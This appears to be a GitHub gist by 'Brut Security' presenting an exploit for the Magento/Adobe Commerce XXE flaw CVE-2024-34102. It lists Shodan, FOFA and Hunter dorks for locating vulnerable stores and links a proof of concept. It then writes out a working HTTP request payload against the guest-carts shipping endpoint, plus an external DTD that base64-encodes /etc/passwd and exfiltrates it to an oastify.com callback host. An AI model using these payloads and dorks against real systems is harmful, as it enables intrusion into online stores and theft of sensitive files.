Created
June 28, 2024 17:36
-
-
Save wtf-yodhha/b4b12a09a4c2d3af0e04b74968daed5d to your computer and use it in GitHub Desktop.
Unauthenticated Magento XXE CVE-2024-34102 to Privilege Escalation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 🔥Magento XXE CVE-2024-34102: A newly discovered vulnerability dubbed “CosmicSting” jeopardizes millions of online stores | |
| built on Adobe Commerce and Magento platforms. | |
| ⚠️CosmicSting enables attackers to gain unauthorized access to sensitive files, including those containing passwords. | |
| When combined with a recent Linux bug (CVE-2024-2961),the vulnerability can be escalated to remote code execution. | |
| 📣Dorks: | |
| Hunter: http://product.name="Adobe Magento" | |
| FOFA: app="Adobe-Magento" | |
| SHODAN: http.html:"magento-template" | |
| 🔴POC: https://github.com/th3gokul/CVE-2024-34102 | |
| ⛔️Payload: | |
| POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2 | |
| Content-Type: application/json | |
| Content-Length: 192 | |
| {"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData": | |
| {"data":"http://*.oastify.com/xxe.xml","dataIsURL":true,"options":12345678}}}}}} | |
| ⚠️Privilege Escalation | |
| {"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData": | |
| {"data": | |
| "<?xml version=\"1.0\" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM \"https://raw.com/exploit2.dtd\"> %sp; %param1; ]> <r>&exfil;</r", | |
| "options":16}}}}}} | |
| <!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> | |
| <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://*.oastify.com/dtd.xml?%data;'>"> | |
| Brut Security |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment